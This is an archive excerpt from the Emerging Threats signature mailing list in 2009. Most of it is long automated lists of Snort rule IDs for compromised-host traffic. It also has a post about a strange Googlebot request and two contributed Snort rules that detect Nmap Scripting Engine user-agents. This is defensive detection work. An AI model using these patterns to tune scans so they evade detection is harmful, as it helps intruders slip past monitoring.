Host Traffic UDP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (138) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510269 || ET COMPROMISED Known Compromised or Hostile Host 
Traffic UDP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (142) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (44): 2006371 || ET MALWARE BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006371 2006372 || ET MALWARE Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006372 2006375 || ET MALWARE Bittorrent P2P Client HTTP Request || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006375 2006379 || ET MALWARE BearShare P2P Gnutella Client HTTP Request || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006379 2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (136) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (139) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From pepperjack at afferentsecurity.com Fri May 22 09:30:10 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Fri, 22 May 2009 08:30:10 -0500
Subject: [Emerging-Sigs] unicode uri content
Message-ID: <20090522083010.g4tsolte04ks440c@mail.afferentsecurity.com>

Picked this up last night. It's not dangerous, and it really did come from google. But what is going on? As near as I can see, they are looking for Chinese characters in the uri ( ? )

GET /?ref=%C4%B0lkSexShop.Com HTTP/1.1
Host: www.pi.ourcity.state.us
Connection: Keep-alive
Accept: */*
From: googlebot(at)googlebot.com
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept-Encoding: gzip,deflate
If-Modified-Since: Fri, 15 May 2009 19:28:49 GMT

jp

--
Framework? I don't need no stinking framework!
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com

From jaime.blasco at alienvault.com Fri May 22 10:04:45 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Fri, 22 May 2009 16:04:45 +0200
Subject: [Emerging-Sigs] nmap scripting engine user-agent
Message-ID: <53834cf20905220704o2715ad03u2e2d1bfbe110b3f2@mail.gmail.com>

Hi, some rules to detect nmap scripting engine common user-agents:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB Nmap Scripting Engine User-Agent Detected (1)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| Nmap NSE"; classtype:web-application-attack; sid:; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB Nmap Scripting Engine User-Agent Detected (2)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| Mozilla/5.0 (compatible|3b| Nmap Scripting Engine"; nocase; classtype:web-application-attack; sid:; rev:1;)

Regards
--
_______________________________
Jaime Blasco
www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com

From jonkman at jonkmans.com Fri May 22 11:38:43 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 22 May 2009 11:38:43 -0400
Subject: [Emerging-Sigs] nmap scripting engine user-agent
In-Reply-To: <53834cf20905220704o2715ad03u2e2d1bfbe110b3f2@mail.gmail.com>
References: <53834cf20905220704o2715ad03u2e2d1bfbe110b3f2@mail.gmail.com>
Message-ID: <4A16C703.1040700@jonkmans.com>

Nice! Posting now. Thanks Jaime.
Matt

Jaime Blasco wrote:
> Hi, some rules to detect nmap scripting engine common user-agents:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB Nmap
> Scripting Engine User-Agent Detected (1)"; flow:to_server,established;
> content:"|0d 0a|User-Agent|3a| Nmap NSE";
> classtype:web-application-attack; sid:; rev:1;)
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB Nmap
> Scripting Engine User-Agent Detected (2)"; flow:to_server,established;
> content:"|0d 0a|User-Agent|3a| Mozilla/5.0 (compatible|3b| Nmap
> Scripting Engine"; nocase; classtype:web-application-attack; sid:; rev:1;)
>
> Regards
> --
> _______________________________
>
> Jaime Blasco
>
> www.ossim.com
> www.alienvault.com
> Email: jaime.blasco at alienvault.com
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Fri May 22 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 22 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090522200011.884DC4504C@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri May 22 16:00:11 2009 [***]

[+++] Added rules: [+++]

2009358 - ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap Scripting Engine) (emerging-scan.rules)
2009359 - ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap NSE) (emerging-scan.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-scan.rules (1):
#by Jaime Blasco

-> Added to emerging-sid-msg.map (2):
2009358 || ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap Scripting Engine) 2009359 || ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap NSE) -> Added to emerging-sid-msg.map.txt (2): 2009358 || ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap Scripting Engine) 2009359 || ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap NSE) [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (60): 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET 
COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500259 || ET COMPROMISED Known Compromised or 
Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (60): 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || 
